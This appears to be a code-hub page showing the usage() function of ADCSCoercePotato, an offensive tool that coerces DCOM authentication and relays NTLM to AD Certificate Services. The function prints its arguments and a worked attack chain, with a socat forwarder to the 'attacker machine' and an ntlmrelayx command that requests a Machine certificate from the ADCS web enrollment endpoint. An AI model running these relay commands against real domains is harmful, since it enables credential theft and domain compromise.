MCPcopy Create free account
hub / github.com/decoder-it/ADCSCoercePotato / usage

Function usage

ADCSCoercePotato.cpp:87–115  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

85 return -1;
86}
87void usage()
88{
89 printf("ADCSCoercePotato\n- @decoder_it 2024\n\n", VERSION);
90
91 printf("Mandatory args: \n"
92 "-u Domain Username\n"
93 "-p password\n"
94 "-d Domain Name\n"
95 "-m <host or IP> remote DCOM (ADCS) server address\n"
96 "-k <IP> redirector where socat and ntlmrelayx is running\n"
97
98 );
99
100 printf("\n\n");
101 printf("Optional args: \n"
102 "-n <port> HTTP port where redirector (ntlmrelayx) is listening, default:80\n"
103 "-l <port> local socket server port, default:9999\n"
104 "-c <clsid> default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}"
105
106
107 );
108 printf("\n\n");
109 printf("Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain\n");
110 printf(" On the Linux box (assuming it has IP:192.168.1.88 and the Windows attacker machine is:192.168.1.89)\n");
111 printf(" and ADCS web enrollment service is also running on:192.168.212.41\n");
112 printf(" -> socat tcp -listen:135, reuseaddr, fork tcp:192.168.1.89:9999 &\n");
113 printf(" -> ntlmrelayx.py -t http://192.168.212.41/certsrv/certrqus.asp --adcs --template Machine -smb2support\n\n");
114
115}
116void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) {
117 short* domainLen, * userLen, * hostnameLen;
118 __int32* domainOffset, * userOffset, * hostnameOffset;

Callers 1

wmainFunction · 0.85

Calls

no outgoing calls

Tested by

no test coverage detected